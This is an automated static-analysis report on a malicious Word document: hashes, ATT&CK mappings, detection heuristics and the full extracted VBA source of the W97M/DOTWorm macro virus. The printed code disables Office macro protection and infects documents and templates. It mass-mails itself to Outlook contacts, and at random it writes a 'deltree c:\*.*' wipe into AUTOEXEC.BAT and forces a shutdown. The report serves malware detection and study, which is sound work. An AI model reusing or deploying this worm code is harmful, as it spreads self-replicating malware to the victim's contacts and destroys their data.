Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc3450dc5827c252…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 33.5 KB
Created: 2002-09-11 01:27:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 17bf9d8413340d8b891338e0cd3f70f0
SHA-1: a6ec869229cbdee71f75b442bc3b51e88fc7eb33
SHA-256: fc3450dc5827c252988b24407ce853240e471e2bfaf7833c6567121f19e8217b
Risk score: 508

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

This document contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based threat. The presence of a Shell() call and CreateObject() suggests the macro is designed to execute arbitrary code or download additional payloads. The ClamAV detection as 'Doc.Trojan.Indeed-1' further supports its malicious nature. The macro attempts to spread itself to other DOT files, characteristic of a worm.

Heuristics (10)

  • ClamAV: Doc.Trojan.Indeed-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Indeed-1
  • VBA macros detected [medium] (OLE_VBA_MACROS), 7 related findings
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
    Shell "C:\MAPI.REG", vbHide
  • LOLBin reference in VBA [critical] (OLE_VBA_LOLBIN)
    LOLBin reference in VBA
    Matched line in script:
    Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • VBA email-worm self-replication (Outlook mass-mailer) [critical] (OLE_VBA_EMAIL_WORM_SELF_REPLICATION)
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, and sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature.
    Matched line in script:
    Set SpamItem = MailSvr.CreateItem(0)
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script:
    Set MailSvr = CreateObject("Outlook.Application")
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3849 bytes
SHA-256: 5f7a7947d7bd0abfc887c54cf24b23c6bb94291a5a40e40b1c3f4aad2de32a9e
Detection
ClamAV: Doc.Trojan.Indeed-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Rem W97M/DOTWorm virus by FSO.
Rem First macro worm to spread in DOT files.
Sub ToolsMacro()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsOptions()
On Error Resume Next
Call MacroWorm
End Sub
Sub ViewVBCode()
On Error Resume Next
Call MacroWorm
End Sub
Sub ToolsSecurity()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileTemplates()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileNew()
On Error Resume Next
Call MacroWorm
End Sub
Sub FileOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoOpen()
On Error Resume Next
Call MacroWorm
End Sub
Sub AutoExec()
On Error Resume Next
Call MacroWorm
End Sub
Sub MacroWorm()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.ShowVisualBasicEditor = False
Options.AllowFastSave = True
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Documents(MacroContainer.Name).VBProject.VBComponents(1).CodeModule
OurLines = OurCode.Lines(1, OurCode.CountOfLines)
For X = 1 To Documents.Count
If Mid(Documents(X).Name, 1, 8) <> "Document" And Documents(X).VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "Rem WM97/DOTWorm virus by FSO." Then
Documents(X).Password = ""
Documents(X).ReadOnlyRecommended = False
Documents(X).WritePassword = ""
With Documents(X).VBProject.VBComponents(1).CodeModule
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End With
With Documents(X)
.SaveAs (.FullName)
End With
End If
Next
For Y = 1 To Templates.Count
With Templates(Y).VBProject.VBComponents(1).CodeModule
If Mid(Templates(Y).Name, 1, 8) <> "Template" And .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
Templates(Y).Save
Next
With NormalTemplate.VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "Rem W97M/DOTWorm virus by FSO." Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurLines
End If
End With
FileCopy NormalTemplate.FullName, Application.Path & "\Love Letter For You.dot"
If Int(Rnd * 5) = 2 Then
Set MailSvr = CreateObject("Outlook.Application")
If MailSvr Is Not Nothing Then
Set MAPI = MailSvr.GetNameSpace("MAPI")
For X = 1 To MAPI.AddressLists.Count
Set AddyList = MAPI.AddressLists(X)
For Y = 1 To AddyList.AddressEntries.Count
Set Contact = AddyList.AddressEntries(Y)
MailAddy = Contact.Address
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\WAB", MailAddy) <> "FSO" Then
Set SpamItem = MailSvr.CreateItem(0)
SpamItem.Bcc = MailAddy
SpamItem.Subject = "Very Funny"
SpamItem.Body = vbCrLf & "  Very good.  A must read, indeed.  Ha!"
SpamItem.DeleteAfterSubmit = True
SpamItem.Attachments.Add (Application.Path & "\Very Funny.dot")
SpamItem.Send
If Dir("C:\MAPI.REG") = "" Then
Open "C:\MAPI.REG" For Output As #1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\WAB]"
End If
Print #1, Chr(34) & MailAddy & Chr(34) & " = " & Chr(34) & "FSO" & Chr(34)
Next
Next
If Dir("C:\MAPI.REG") <> "" Then
Print #1, ""
Print #1, ""
Close #1
Shell "C:\MAPI.REG", vbHide
End If
End If
End If
If Int(Rnd * 30) = 2 Then
Call Ha
End If
End Sub
Sub Ha()
Open "C:\AUTOEXEC.BAT" For Output As #2
Print #2, "Rem System Check"
Print #2, "deltree c:\*.* /y"
Print #2, "Rem System Check!  That's bull****!"
Close #2
Shell "RUNDLL32.EXE,user.exe,exitwindows", vbHide
End Sub
Rem Ha! Have a nice day!